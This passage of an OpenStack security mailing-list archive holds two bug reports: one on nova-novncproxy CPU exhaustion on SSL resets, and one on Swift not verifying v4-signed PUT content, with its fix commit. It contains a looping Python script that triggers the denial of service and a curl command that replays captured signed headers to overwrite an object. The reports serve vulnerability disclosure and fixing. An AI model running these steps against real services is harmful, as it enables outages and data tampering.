652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 
2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. 
Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1816727 at bugs.launchpad.net Wed Mar 20 20:41:38 2019 From: 1816727 at bugs.launchpad.net (melanie witt) Date: Wed, 20 Mar 2019 20:41:38 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155311450022.19282.12942911233060396713.launchpad@chaenomeles.canonical.com> ** Changed in: nova Importance: Undecided => Medium ** Tags added: console -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). 
Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - 
- - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 
15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. 
Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1765834 at bugs.launchpad.net Wed Mar 20 23:53:01 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 23:53:01 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155312598157.18692.1941630739827836081.malone@chaenomeles.canonical.com> Reviewed: https://review.openstack.org/629301 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Submitter: Zuul Branch: master commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 Closes-Bug: 1765834 ** Changed in: swift Status: New => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
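The commit message above describes wrapping the wsgi.input handed to the proxy-server app so that the body is hashed as it is read and compared against the client-declared X-Amz-Content-SHA256. The snippet below is only a schematic illustration of that idea; it is not Swift's actual code, and the class and exception names are invented:

```python
# Schematic illustration of hashing a WSGI input stream as it is consumed
# and comparing the digest with the SHA-256 the client declared. Sketch
# only; not the swift/s3api implementation.
import hashlib


class ContentSHA256Mismatch(Exception):
    pass


class HashingInput(object):
    def __init__(self, wsgi_input, content_length, expected_hex_sha256):
        self._input = wsgi_input
        self._to_read = content_length
        self._expected = expected_hex_sha256.lower()
        self._hasher = hashlib.sha256()

    def read(self, size=None):
        chunk = (self._input.read(size) if size is not None
                 else self._input.read())
        self._hasher.update(chunk)
        self._to_read -= len(chunk)
        if self._to_read <= 0 or not chunk:
            # End of declared body (or EOF): verify the running digest.
            if self._hasher.hexdigest() != self._expected:
                raise ContentSHA256Mismatch(
                    'body does not match X-Amz-Content-SHA256')
        return chunk
```

In such a scheme, a middleware would substitute `env['wsgi.input'] = HashingInput(...)` before passing the request downstream, so the mismatch is detected as the body is streamed rather than after the fact.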
https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... 
DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: 
signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... 
